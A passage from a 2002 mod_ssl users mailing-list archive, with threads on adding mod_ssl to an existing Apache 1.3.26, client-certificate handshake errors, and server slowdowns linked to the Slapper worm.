TECHNICAL SUGGESTIONS OR 

EVEN SOURCE PATCHES TO THE AUTHOR OR OTHER PEOPLE =
YOU ARE STRONGLY 

ADVISED TO PAY CLOSE ATTENTION TO ANY EXPORT/IMPORT =
AND/OR USE LAWS 

WHICH APPLY TO YOU. WE NOR THE AUTHORS OF THE =
REPRESENTED SOFTWARE 

PACKAGES ARE OR WILL BE HELD LIABLE FOR ANY =
VIOLATIONS YOU MAKE. BE 

CAREFUL, IT IS YOUR RESPONSIBILITY.




_______________________________________________________________=
_______

Apache Interface to OpenSSL =
(mod_ssl)          &nb=
sp;        www.modssl.org

User Support Mailing =
List           &n=
bsp;          =
modssl-users@modssl.org

Automated List =
Manager           =
;            =
;     majordomo@modssl.org





------_=_NextPart_001_01C2671B.0A32857A--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Sep 29 13:03:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA00888; Sun, 29 Sep 2002 13:02:05 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id NAA00884; Sun, 29 Sep 2002 13:01:49 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id EDCB64CE743; Sun, 29 Sep 2002 13:01:49 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id CC77A28843; Sun, 29 Sep 2002 11:56:06 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from relay1.softcomca.com id IAA26657; Sun, 29 Sep 2002 08:23:17 +0200 (MET DST)
Received: from M2W064.mail2web.com ([168.144.108.64]) by relay1.softcomca.com with Microsoft SMTPSVC(5.0.2195.5329);
	 Sun, 29 Sep 2002 02:23:11 -0400
Message-ID: <63340-2200290296231163@M2W064.mail2web.com>
X-Priority: 3
X-Originating-IP: 199.182.13.192
X-URL: http://mail2web.com/
From: "ibrahim@mediasoft-inc.com" 
To: modssl-users@modssl.org, modssl-users@modssl.org
Subject: RE: mod_ssl and apache 1.3.26
Date: Sun, 29 Sep 2002 02:23:11 -0400
MIME-Version: 1.0
Content-type: text/plain; charset=iso-8859-1
X-OriginalArrivalTime: 29 Sep 2002 06:23:11.0041 (UTC) FILETIME=[AF113310:01C26780]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id IAA26658
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "ibrahim@mediasoft-inc.com" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hey , 

I too have the same requirement. I want to install(add module) only mod_ssl
to existing apache and openssl . Many sites explain how to install apache
with mod_ssl from their sources. but no where I found how to add the
mod_ssl module alone. 

I appreciate if any one can help us in doing this. 

thanks 
ibrahim

Original Message:
-----------------
From: Andreas Schnell andreas.schnell@creativez.de
Date: Sat, 28 Sep 2002 17:31:35 +0200
To: modssl-users@modssl.org
Subject: mod_ssl and apache 1.3.26


Hey,

I try to install mod_ssl.

The problem is that the install manual just describes how to install it
together with apache and openssl.

Well... I have Apache 1.3.26 and openssl 0.9.6c already installed and don't
want to remove it just to install mod_ssl.

Is there any way to install mod_ssl, even if apache and openssl is already
installed ?
I hope so.

Any help is greatly appreciated.

Thnx

Andreas


--------------------------------------------------------------------
mail2web - Check your email from the web at
http://mail2web.com/ .

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Sep 29 16:24:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA04300; Sun, 29 Sep 2002 16:23:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhub.AXP.MDX.AC.UK id QAA04294; Sun, 29 Sep 2002 16:22:22 +0200 (MET DST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636)
 id <01KN2T3Y8V3400ROQD@mdx.ac.uk> for modssl-users@modssl.org; Sun,
 29 Sep 2002 15:22:34 +0100 (BST)
Received: from mdx-cpq-temp1.nw.mdx.ac.uk ([158.94.52.12])
 by mdx.ac.uk (PMDF V6.1-1 #38636) with ESMTP id <01KN2T3WXI3S00O5T4@mdx.ac.uk>
 for modssl-users@modssl.org; Sun, 29 Sep 2002 15:22:33 +0100 (BST)
Received: from MDX-CPQ-TEMP1/SpoolDir by mdx-cpq-temp1.nw.mdx.ac.uk
 (Mercury 1.48); Sun, 29 Sep 2002 15:19:21 +0000
Received: from SpoolDir by MDX-CPQ-TEMP1 (Mercury 1.48); Sun,
 29 Sep 2002 15:19:07 +0000
Date: Sun, 29 Sep 2002 14:29:14 +0000
From: a.moon@mdx.ac.uk
Subject: RE: mod_ssl and apache 1.3.26
To: modssl-users@modssl.org
Message-id: <28C9049796C@mdx-cpq-temp1.nw.mdx.ac.uk>
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Due to unaviodable circumstances, I am away from the office until the Monday 30th September 2002 

I will get back to you as soon as i can on my return.

If it's an urgent Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter
that requires urgent attention then  please contact either  Kirsteen1, Sanjay1 or Jeff1
who should be able to help.

If the problem relates to mubsweb please contact sanjay1
If the probelm relates to OASIS or WebCT please contact Kirsteen1
If your query  relates to mbs1111 or it support please contact Jeff1

All the best 
Alex
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Sep 29 16:33:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA04474; Sun, 29 Sep 2002 16:32:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts16-srv.bellnexxia.net id QAA04466; Sun, 29 Sep 2002 16:31:41 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253])
          by tomts16-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020929143139.SSYB15333.tomts16-srv.bellnexxia.net@sympatico.ca>
          for ; Sun, 29 Sep 2002 10:31:39 -0400
Message-ID: <3D970EDA.9080604@sympatico.ca>
Date: Sun, 29 Sep 2002 10:31:54 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: mod_ssl and apache 1.3.26
References: <001a01c26704$21d7b4f0$c9a6fea9@nimmerleer>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Andreas Schnell wrote:
> Hey,
>  
> I try to install mod_ssl.
>  
> The problem is that the install manual just describes how to install it 
> together with apache and openssl.
>  
> Well... I have Apache 1.3.26 and openssl 0.9.6c already installed and 
> don't want to remove it just to install mod_ssl.
>  
> Is there any way to install mod_ssl, even if apache and openssl is 
> already installed ?
> I hope so.
>  
> Any help is greatly appreciated.
>  
> Thnx
>  
> Andreas

Andreas,

Windows or Unix?

On Windows I may be able to explain it, but not Unix.

You should not continue to use OpenSSL 0.9.6c, there are serious 
exploitable flaws in versions less than 0.9.6g.  In any case I think it 
matters more that mod_ssl be built with a specific version of OpenSSL. 
Adding the mod to Apache should be possible without reinstalling.

However, by saving your httpd.conf and replacing it later, a refresh of 
the whole code base is not be a big deal in my mind.

-chris


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Sep 29 16:33:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA04477; Sun, 29 Sep 2002 16:32:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts23-srv.bellnexxia.net id QAA04470; Sun, 29 Sep 2002 16:32:00 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253])
          by tomts23-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020929143149.CXFB24834.tomts23-srv.bellnexxia.net@sympatico.ca>
          for ; Sun, 29 Sep 2002 10:31:49 -0400
Message-ID: <3D970EE5.2010604@sympatico.ca>
Date: Sun, 29 Sep 2002 10:32:05 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: mod_ssl and apache 1.3.26
References: <63340-2200290296231163@M2W064.mail2web.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

ibrahim@mediasoft-inc.com wrote:
> Hey , 
> 
> I too have the same requirement. I want to install(add module) only mod_ssl
> to existing apache and openssl . Many sites explain how to install apache
> with mod_ssl from their sources. but no where I found how to add the
> mod_ssl module alone. 
> 
> I appreciate if any one can help us in doing this. 
> 
> thanks 
> ibrahim
> 
> Original Message:
> -----------------
> From: Andreas Schnell andreas.schnell@creativez.de
> Date: Sat, 28 Sep 2002 17:31:35 +0200
> To: modssl-users@modssl.org
> Subject: mod_ssl and apache 1.3.26
> 
> 
> Hey,
> 
> I try to install mod_ssl.
> 
> The problem is that the install manual just describes how to install it
> together with apache and openssl.
> 
> Well... I have Apache 1.3.26 and openssl 0.9.6c already installed and don't
> want to remove it just to install mod_ssl.
> 
> Is there any way to install mod_ssl, even if apache and openssl is already
> installed ?
> I hope so.
> 
> Any help is greatly appreciated.
> 
> Thnx
> 
> Andreas
> 
> 
> --------------------------------------------------------------------
> mail2web - Check your email from the web at
> http://mail2web.com/ .
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

Ibrahim,

Windows or Unix?

On Windows I may be able to explain it, but not Unix.
Read my reply to Andreas re version of OpennSSL.

-chris

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Sep 29 18:10:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA06440; Sun, 29 Sep 2002 18:09:06 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.staff.tdk.net id SAA06435; Sun, 29 Sep 2002 18:08:49 +0200 (MET DST)
Received: by marvin-lnx.staff.tdk.net (Postfix, from userid 500)
	id 76359BD2E; Sun, 29 Sep 2002 18:09:18 +0200 (CEST)
Date: Sun, 29 Sep 2002 18:09:18 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: mod_ssl and apache 1.3.26
Message-ID: <20020929160918.GA24180@marvin-lnx.staff.tdk.net>
Mail-Followup-To: modssl-users@modssl.org
References: <63340-2200290296231163@M2W064.mail2web.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <63340-2200290296231163@M2W064.mail2web.com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Sun, Sep 29, 2002 at 02:23:11AM -0400, ibrahim@mediasoft-inc.com wrote:
> Hey , 
> 
> I too have the same requirement. I want to install(add module) only mod_ssl
> to existing apache and openssl . Many sites explain how to install apache
> with mod_ssl from their sources. but no where I found how to add the
> mod_ssl module alone. 
> 
This is only possible if apache already has EAPI built in.
To check do: ./httpd -V
It should list:  -D EAPI for the install without rebuilding apache
to work.
Also make sure that openssl is OpenSSL 0.9.6g.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 30 05:51:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA19418; Mon, 30 Sep 2002 05:50:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pikachu.proaccessph.com id FAA19393; Mon, 30 Sep 2002 05:49:39 +0200 (MET DST)
Received: from glynn (glynn.proaccessph.com [192.168.1.130])
	by pikachu.proaccessph.com (8.12.4/8.12.4) with SMTP id g8U3qfo3013404
	for ; Mon, 30 Sep 2002 11:52:41 +0800
Message-ID: <018301c26834$47645120$8201a8c0@proaccessph.com>
From: "Glynn S. Condez" 
To: 
Subject: Log errors in client certificate auth
Date: Mon, 30 Sep 2002 11:48:46 +0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
X-ECS-MailScanner: Found to be clean
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Glynn S. Condez" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I found this error in my ssl_engine.log when I access to apache+modssl site
with client certificate authentication.
what does it mean by this error and how do I fix this?

Actually I dont have problems in accessing it but some of our users
encountered page cannot be displayed.

----------------snip------------------
[30/Sep/2002 11:36:56 20984] [trace] OpenSSL: Exit: failed in SSLv3 read
client certificate A
[30/Sep/2002 11:36:56 20984] [error] Re-negotiation handshake failed: Not
accepted by client!?
[30/Sep/2002 11:36:56 20984] [debug] OpenSSL: read 0/34821 bytes from
BIO#08217818 [mem: 082C6BE8] (BIO dump follows)
+-------------------------------------------------------------------------+
+-------------------------------------------------------------------------+
[30/Sep/2002 11:36:56 20984] [trace] OpenSSL: Exit: failed in SSLv3 read
client certificate A
[30/Sep/2002 11:36:56 20984] [error] SSL error on writing data (OpenSSL
library error follows)
[30/Sep/2002 11:36:56 20984] [error] OpenSSL: error:1409E0E5:SSL
routines:SSL3_WRITE_BYTES:ssl handshake failure
[30/Sep/2002 11:36:56 20984] [info]  Connection to child 5 closed with
unclean shutdown (server mail.server.com:443, client 192.168.1.1)
-----------------snip-----------------

TIA
--- Glynn ---



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 30 08:58:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA22774; Mon, 30 Sep 2002 08:57:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA22764; Mon, 30 Sep 2002 08:56:46 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 8A2684CE6E2; Mon, 30 Sep 2002 08:56:47 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 873CA287C4; Mon, 30 Sep 2002 08:55:17 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from relay3.softcomca.com id VAA09957; Sun, 29 Sep 2002 21:48:33 +0200 (MET DST)
Received: from M2W094.mail2web.com ([168.144.108.94]) by relay3.softcomca.com with Microsoft SMTPSVC(5.0.2195.5329);
	 Sun, 29 Sep 2002 15:48:31 -0400
Message-ID: <232810-220029029194831828@M2W094.mail2web.com>
X-Priority: 3
X-Originating-IP: 207.220.136.233
X-URL: http://mail2web.com/
From: "ibrahim@mediasoft-inc.com" 
To: modssl-users@modssl.org, modssl-users@modssl.org
Subject: Re: mod_ssl and apache 1.3.26
Date: Sun, 29 Sep 2002 15:48:31 -0400
MIME-Version: 1.0
Content-type: text/plain; charset=iso-8859-1
X-OriginalArrivalTime: 29 Sep 2002 19:48:31.0589 (UTC) FILETIME=[305BB150:01C267F1]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id VAA09959
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "ibrahim@mediasoft-inc.com" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

HI  chris , 

I have a Debian version of Linux  . 
I will try to re-install apache itself and copy the httpd.conf , I currenlty
have . Right now our debian server is used by a testing organization to
test our applications residing on this server. 

thought there should be some way to add mod_ssl without disturbing their
work . 

thanks 
ibrahim

Ibrahim,

Windows or Unix?
 
On Windows I may be able to explain it, but not Unix.
Read my reply to Andreas re version of OpennSSL.

-chris

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

--------------------------------------------------------------------
mail2web - Check your email from the web at
http://mail2web.com/ .

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 30 08:58:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA22777; Mon, 30 Sep 2002 08:57:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA22765; Mon, 30 Sep 2002 08:56:46 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 9925F4CE748; Mon, 30 Sep 2002 08:56:47 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E59612883C; Mon, 30 Sep 2002 08:55:21 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from gunny.gunman.org id WAA10569; Sun, 29 Sep 2002 22:16:32 +0200 (MET DST)
Received: (from gunther@localhost)
	by gunny.gunman.org (8.11.2/8.11.2) id g8TJs3M18881
	for modssl-users@modssl.org; Sun, 29 Sep 2002 12:54:03 -0700 (PDT)
Message-ID: <20020929125402.C18448@gunman.org>
Date: Sun, 29 Sep 2002 12:54:02 -0700
From: P a u l Guth 
To: modssl-users@modssl.org
Subject: slapper(?) causing DoS/mutex file disappearing
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: P a u l Guth 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Starting last Thursday, we started to see one of our webservers
become unresponsive for about 10 minutes...it seemed to be correlated
with what appeared to be a slapper/OpenSSL worm attack.  We are
not vulnerable to the worm but the attack seemed to use up some
resources (not CPU) that prevented apache from answering more requests.
Note that it corrects itself after 10 minutes or so without manual
intervention.

Here's the ouput of our Server: header.
Server: Apache/1.3.26 (Unix) mod_ssl/2.8.9 OpenSSL/0.9.6g mod_jk

The error in the logs is:
[Thu Sep 26 20:55:18 2002] [error] OpenSSL: error:1406B458:SSL routines:GET_CLIENT_MASTER_KEY:key arg too long

There also are a lot of errors like this that start at the same time:
[Thu Sep 26 20:49:36 2002] [error] mod_ssl: Child could not open SSLMutex lockfile /usr/local/apache/logs/ssl_mutex.22003 (System error follows)

And sure enough the mutex file on that server is gone.  It comes
back on restart...but what the heck is going on here?  Anyone having
similar issues?

This is driving me crazy as this is on our production servers and
I'm not going to get a wink of sleep tonight unless I figure out
how to stop it....

___________________________________________________________________
P                     a                     u                     l
                           g@gunman.org 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 30 09:39:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA24066; Mon, 30 Sep 2002 09:38:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from d101.x-mailer.de id JAA24062; Mon, 30 Sep 2002 09:37:10 +0200 (MET DST)
Received: from [217.229.171.251] (helo=workstation.gietl.com)
	by d101.x-mailer.de with asmtp (TLSv1:RC4-MD5:128)
	(Exim 3.33 #3)
	id 17vv6i-0006Gh-00; Mon, 30 Sep 2002 09:36:44 +0200
Content-Type: text/plain;
  charset="iso-8859-1"
From: Andreas Gietl 
Organization: e-admin internet gmbh
To: modssl-users@modssl.org, P a u l Guth 
Subject: Re: slapper(?) causing DoS/mutex file disappearing
Date: Mon, 30 Sep 2002 09:36:41 +0200
User-Agent: KMail/1.4.3
References: <20020929125402.C18448@gunman.org>
In-Reply-To: <20020929125402.C18448@gunman.org>
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-Id: <200209300936.41887.a.gietl@e-admin.de>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andreas Gietl 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Sunday 29 September 2002 21:54, P a u l Guth wrote:

we are experiencing the same here esp. on machines with lots of normal 
apache-clients + lots of ips.

I guess that Apache does detect the problem and writes 

client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /

to the logs but does not terminate the child-process. So at one time  -when 
you have a lot of ips and they are all scanned - you reach the MaxClients 
limit.

I'm not sure why apache behaves this way.

Andreas

> Starting last Thursday, we started to see one of our webservers
> become unresponsive for about 10 minutes...it seemed to be correlated
> with what appeared to be a slapper/OpenSSL worm attack.  We are
> not vulnerable to the worm but the attack seemed to use up some
> resources (not CPU) that prevented apache from answering more requests.
> Note that it corrects itself after 10 minutes or so without manual
> intervention.
>
> Here's the ouput of our Server: header.
> Server: Apache/1.3.26 (Unix) mod_ssl/2.8.9 OpenSSL/0.9.6g mod_jk
>
> The error in the logs is:
> [Thu Sep 26 20:55:18 2002] [error] OpenSSL: error:1406B458:SSL
> routines:GET_CLIENT_MASTER_KEY:key arg too long
>
> There also are a lot of errors like this that start at the same time:
> [Thu Sep 26 20:49:36 2002] [error] mod_ssl: Child could not open SSLMutex
> lockfile /usr/local/apache/logs/ssl_mutex.22003 (System error follows)
>
> And sure enough the mutex file on that server is gone.  It comes
> back on restart...but what the heck is going on here?  Anyone having
> similar issues?
>
> This is driving me crazy as this is on our production servers and
> I'm not going to get a wink of sleep tonight unless I figure out
> how to stop it....
>
> ___________________________________________________________________
> P                     a                     u                     l
>                            g@gunman.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
e-admin internet gmbh
Andreas Gietl                                          tel +49 941 3810884
Ludwig-Thoma-Strasse 35                      fax +49 941 3810891
93051 Regensburg                                  mobil +49 171 6070008

PGP/GPG-Key unter http://www.e-admin.de/gpg.html




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 30 14:35:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA29733; Mon, 30 Sep 2002 14:34:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts24-srv.bellnexxia.net id OAA29717; Mon, 30 Sep 2002 14:33:31 +0200 (MET DST)
Received: from sympatico.ca ([64.231.121.253])
          by tomts24-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020930123323.HWYF17912.tomts24-srv.bellnexxia.net@sympatico.ca>
          for ; Mon, 30 Sep 2002 08:33:23 -0400
Message-ID: <3D9844A4.9010908@sympatico.ca>
Date: Mon, 30 Sep 2002 08:33:40 -0400
From: hunter 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: mod_ssl and apache 1.3.26
References: <232810-220029029194831828@M2W094.mail2web.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

ibrahim@mediasoft-inc.com wrote:
> HI  chris , 
> 
> I have a Debian version of Linux  . 
> I will try to re-install apache itself and copy the httpd.conf , I currenlty
> have . Right now our debian server is used by a testing organization to
> test our applications residing on this server. 
> 
> thought there should be some way to add mod_ssl without disturbing their
> work . 
> 
> thanks 
> ibrahim
> 
> Ibrahim,
> 
> Windows or Unix?
>  
> On Windows I may be able to explain it, but not Unix.
> Read my reply to Andreas re version of OpennSSL.
> 
> -chris
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> --------------------------------------------------------------------
> mail2web - Check your email from the web at
> http://mail2web.com/ .
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

Ibrahim,

I have Debian as well.

I generally let apt-get (dpkg) handle everything.  I tweak the Apache 
slightly.  I would say that apt will handle your situation as well.

I installed apache and then later installed apache-ssl. I seems to work 
fine but it also looks like there are 2 servers.  In fact if you install 
only apache-ssl you do not have http, it seems.

I only use my server for playing around on. I can experiment if that is 
of any help to you.  I also have two more Debian machines that I can 
experiment with ... one is already running apache the other is not - but 
could be.

My experience would indicate that your previous configuration will be 
preserved - sometimes even when you rather it did not.

apt-get update
apt-get upgrade

These are the sources that I use.  I am checking now to see what revs I 
am actually running (I am reasonably certain that apt-get updated the 
ssl in the past 2 weeks. I am running sshd as well and it needed the 
update as well.

deb http://mirror.direct.ca/linux/debian/ testing main contrib
deb-src http://mirror.direct.ca/linux/debian/ testing main contrib
deb http://non-us.debian.org/debian-non-US woody/non-US main
deb-src http://non-us.debian.org/debian-non-US woody/non-US main
deb http://security.debian.org/ stable/updates main
deb http://security.debian.org/ woody/updates main contrib non-free

The resulting versions are ...

Apache/1.3.26 (Unix) Debian GNU/Linux
Apache/1.3.26 Ben-SSL/1.48 (Unix) Debian GNU/Linux

I do not know enough about it, but the Ben-SSL may not be mod_ssl, it is 
listed as apache_ssl.

Included in apache-ssl (Woody testing)...

libc6 2.2.5-14.3
libdb2 2:2.7.7.0-8
libexpat1 1.95.2-6
libssl0.9.6 0.9.6g-2 < this is important
mime-support 3.19-1
apache-common 1.3.26-1.1
perl 5.6.1-7
libgdbmg1 1.7.3-27.1
perl-doc 5.6.1-7
logrotate 3.6.5-1
dpkg 1.10.4
openssl 0.9.6g-2 < this is important
apache-doc 1.3.26-1.1


I built the Apache, mod_ssl, OpenSSL (Win32) for Apache 1.3.26 but I do 
not use it - others asked for it.  On windows I am using Apache 2.0.42 - 
it has (can have) the SSL built-in but I am not using it.

If someone else would like to comment (not about using Windows) it would 
be appreciated.


My suggestion...

Add sources to security and testing if necessary and run:
apt-get update
apt-get upgrade

Originally Woody had Apache 1.3.24 - my current rev were updated by 
apt-get update/upgrade.

Chris.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep 30 15:30:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA01305; Mon, 30 Sep 2002 15:29:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.gactr.uga.edu id PAA01295; Mon, 30 Sep 2002 15:29:02 +0200 (MET DST)
Received: (qmail 90701 invoked from network); 30 Sep 2002 13:28:56 -0000
Received: from unknown (HELO georgiacenter.org) ([10.10.25.125]) (envelope-sender )
          by mail.servers.gactr.gc.nat (qmail-ldap-1.03) with SMTP
          for ; 30 Sep 2002 13:28:56 -0000
Message-ID: <3D985198.9080102@georgiacenter.org>
Date: Mon, 30 Sep 2002 09:28:56 -0400
From: "Robin P. Blanchard" 
Organization: Georgia Center for Continuing Education
